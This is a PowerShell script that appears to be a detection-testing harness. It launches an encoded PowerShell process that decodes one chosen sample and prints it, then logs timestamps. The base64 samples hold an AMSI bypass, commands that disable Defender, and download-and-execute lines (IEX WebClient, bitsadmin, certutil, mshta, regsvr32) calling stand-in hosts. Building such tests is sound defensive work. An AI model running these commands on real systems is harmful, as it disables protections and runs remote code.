[CmdletBinding()]
param(
    [Parameter(Mandatory = $true)]
    [ValidateSet(
        "amsi_bypass",
        "defender_tamper",
        "iex_webclient",
        "download_execute",
        "bitsadmin",
        "certutil",
        "mshta",
        "rundll32",
        "regsvr32"
    )]
    [string]$Name
)

$samples = @{
    amsi_bypass = "WwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkA"
    defender_tamper = "UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFQAZQBtAHAA"
    iex_webclient = "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADgALgA1ADEALgAxADAAMAAuADEAMAAvAHAAYQB5AGwAbwBhAGQALgBwAHMAMQAnACkA"
    download_execute = "SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJwBoAHQAdABwADoALwAvADEAOQA4AC4ANQAxAC4AMQAwADAALgA2ADAALwBwAGEAeQBsAG8AYQBkAC4AZQB4AGUAJwAgAC0ATwB1AHQARgBpAGwAZQAgACQAZQBuAHYAOgBUAEUATQBQAFwAcABhAHkAbABvAGEAZAAuAGUAeABlADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AFQARQBNAFAAXABwAGEAeQBsAG8AYQBkAC4AZQB4AGUA"
    bitsadmin = "YgBpAHQAcwBhAGQAbQBpAG4ALgBlAHgAZQAgAC8AdAByAGEAbgBzAGYAZQByACAAagBvAGIAIAAvAGQAbwB3AG4AbABvAGEAZAAgAC8AcAByAGkAbwByAGkAdAB5ACAAbgBvAHIAbQBhAGwAIABoAHQAdABwADoALwAvADEAOQA4AC4ANQAxAC4AMQAwADAALgAyADAALwBwAGEAeQBsAG8AYQBkAC4AZQB4AGUAIABDADoAXABVAHMAZQByAHMAXABQAHUAYgBsAGkAYwBcAHAAYQB5AGwAbwBhAGQALgBlAHgAZQA="
    certutil = "YwBlAHIAdAB1AHQAaQBsAC4AZQB4AGUAIAAtAHUAcgBsAGMAYQBjAGgAZQAgAC0AZgAgAGgAdAB0AHAAOgAvAC8AMQA5ADgALgA1ADEALgAxADAAMAAuADMAMAAvAHAAYQB5AGwAbwBhAGQALgBiAGkAbgAgAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwAcABhAHkAbABvAGEAZAAuAGIAaQBuAA=="
    mshta = "bQBzAGgAdABhAC4AZQB4AGUAIABoAHQAdABwADoALwAvADEAOQA4AC4ANQAxAC4AMQAwADAALgA0ADAALwBwAGEAeQBsAG8AYQBkAC4AaAB0AGEA"
    rundll32 = "cgB1AG4AZABsAGwAMwAyAC4AZQB4AGUAIABDADoAXABVAHMAZQByAHMAXABQAHUAYgBsAGkAYwBcAGUAdgBpAGwALgBkAGwAbAAsAEUAbgB0AHIAeQBQAG8AaQBuAHQA"
    regsvr32 = "cgBlAGcAcwB2AHIAMwAyAC4AZQB4AGUAIAAvAHMAIAAvAG4AIAAvAHUAIAAvAGkAOgBoAHQAdABwADoALwAvADEAOQA4AC4ANQAxAC4AMQAwADAALgA1ADAALwBwAGEAeQBsAG8AYQBkAC4AcwBjAHQAIABzAGMAcgBvAGIAagAuAGQAbABsAA=="
}

$encoded = $samples[$Name]
$wrapper = "`$d=[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('$encoded')); Write-Host `$d"
$wrapperEncoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($wrapper))

$startUtc = (Get-Date).ToUniversalTime().ToString("o")
Write-Host "Triggering sample: $Name"
Write-Host "Start UTC: $startUtc"
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand $wrapperEncoded | Out-Null
$endUtc = (Get-Date).ToUniversalTime().ToString("o")
Write-Host "Completed sample: $Name"
Write-Host "End UTC: $endUtc"
